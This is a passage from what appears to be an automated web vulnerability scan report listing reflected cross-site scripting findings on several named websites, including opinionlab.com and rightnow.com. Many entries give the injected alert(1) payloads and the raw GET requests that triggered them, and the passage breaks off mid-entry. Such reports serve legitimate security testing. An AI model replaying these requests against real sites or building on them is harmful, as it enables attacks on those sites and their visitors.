The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload 64b78<script>alert(1)</script>0327368a54ef65d92 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78<script>alert(1)</script>0327368a54ef65d92' }); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78< ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c1c5'%3balert(1)//7b24542dda8 was submitted in the REST URL parameter 1. This input was echoed as 4c1c5';alert(1)//7b24542dda8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e8f'%3balert(1)//10ffe396caa was submitted in the REST URL parameter 2. This input was echoed as a0e8f';alert(1)//10ffe396caa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a909'%3balert(1)//aa28d82e17b was submitted in the REST URL parameter 3. This input was echoed as 3a909';alert(1)//aa28d82e17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 628cf'%3balert(1)//4f051986422 was submitted in the REST URL parameter 4. This input was echoed as 628cf';alert(1)//4f051986422 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfa16'%3balert(1)//613bf33760e was submitted in the REST URL parameter 5. This input was echoed as cfa16';alert(1)//613bf33760e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96e84'%3balert(1)//ac257857d1c was submitted in the REST URL parameter 6. This input was echoed as 96e84';alert(1)//ac257857d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c8a'%3balert(1)//f3a23f825a9 was submitted in the REST URL parameter 7. This input was echoed as 49c8a';alert(1)//f3a23f825a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf3f'%3balert(1)//71f8b572442 was submitted in the REST URL parameter 1. This input was echoed as 3bf3f';alert(1)//71f8b572442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 324af'%3balert(1)//48d92f1efda was submitted in the REST URL parameter 2. This input was echoed as 324af';alert(1)//48d92f1efda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.370. http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.opinionlab.com
Path:
/content
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd8a</script><script>alert(1)</script>91c9b453f97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content?1cd8a</script><script>alert(1)</script>91c9b453f97=1 HTTP/1.1
Host: www.opinionlab.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/site_map
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro ...[SNIP]...
<!-- /* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName=oPageName
s.server=ol_siteURL
s.channel="/content/?1cd8a</script><script>alert(1)</script>91c9b453f97=1" // Section name
s.campaign=""
s.prop1=oPageName // page name
s.prop2="5767.4e5faf709594e1.24524238" // WEBID
/* Custom variables for custom reporting */
s.eVar1=oPageName
s.eVar2="5767.4e5f ...[SNIP]...
1.371. http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.opinionlab.com
Path:
/content/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61856</script><script>alert(1)</script>d1297f41988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/?61856</script><script>alert(1)</script>d1297f41988=1 HTTP/1.1
Host: www.opinionlab.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/site_map
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro ...[SNIP]...
<!-- /* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName=oPageName
s.server=ol_siteURL
s.channel="/content/?61856</script><script>alert(1)</script>d1297f41988=1" // Section name
s.campaign=""
s.prop1=oPageName // page name
s.prop2="5767.4e5faf709594e1.24524238" // WEBID
/* Custom variables for custom reporting */
s.eVar1=oPageName
s.eVar2="5767.4e5f ...[SNIP]...
1.372. http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rbisaleschallenge.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0eeb"><script>alert(1)</script>02fed4cc8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d0eeb"><script>alert(1)</script>02fed4cc8e9=1 HTTP/1.1
Host: www.rbisaleschallenge.com
Proxy-Connection: keep-alive
Referer: http://wiki.coldbox.org/wiki/UsingColdBox.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>www.rbisaleschallenge.com</title>
</head>
<frameset rows="100%,*" bor ...[SNIP]...
<frame src="http://rbisaleschallenge.wpunj.edu/?d0eeb"><script>alert(1)</script>02fed4cc8e9=1" frameborder="0" />
...[SNIP]...
1.373. http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rbisaleschallenge.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a69"><script>alert(1)</script>afb96244eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1 HTTP/1.1
Host: www.rbisaleschallenge.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>www.rbisaleschallenge.com</title>
</head>
<frameset rows="100%,*" bor ...[SNIP]...
<frame src="http://rbisaleschallenge.wpunj.edu/favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1" frameborder="0" />
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d34'-alert(1)-'e12bb55d977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.375. http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/company-contact.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f9d'-alert(1)-'531b674974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20623'-alert(1)-'468b397d330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.html20623'-alert(1)-'468b397d330 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38684
1.377. http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/cx.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa271'-alert(1)-'eab22d1b281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.html?fa271'-alert(1)-'eab22d1b281=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58a7'-alert(1)-'e244cb60cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.phpd58a7'-alert(1)-'e244cb60cfb HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38683
1.379. http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/cx.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dfa'-alert(1)-'b945d6d6f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cx.php?13dfa'-alert(1)-'b945d6d6f74=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e25'-alert(1)-'79fc9cf9e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.icoc7e25'-alert(1)-'79fc9cf9e4a HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.rightnow.com
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38609
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6679'-alert(1)-'58fa45e0a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfe4'-alert(1)-'603995fd0d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2c8'-alert(1)-'e0337fe94ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdea'-alert(1)-'da2dd0d86eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e759a'-alert(1)-'5ea9d5a4cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72b2'-alert(1)-'fc5f88b9e75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ccba'-alert(1)-'19306ec160d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 215d1'-alert(1)-'360df0dd7fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e75a1'-alert(1)-'1dafc8057a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 811b9'-alert(1)-'6a55d50ed35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36081'-alert(1)-'cf2eb8cd43c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37356'-alert(1)-'f2a926604f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.393. http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/floatbox.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9ba9'-alert(1)-'a3061f6490a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b27'-alert(1)-'d42ec4174bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e26f2'-alert(1)-'ac9e6d2d317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add9f'-alert(1)-'184d0a8c26f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.397. http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/floatbox.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a00e9'-alert(1)-'1e361830eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7146'-alert(1)-'b47c019bbba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f14c3'-alert(1)-'4fea86764d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7cf'-alert(1)-'91c57ac54d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.401. http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/floatbox/options.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f994b'-alert(1)-'7f5fbe479da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c525'-alert(1)-'f85878e1394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbab8'-alert(1)-'4bb75d35616 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.404. http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/javascript/form.110610.js
Issue detail
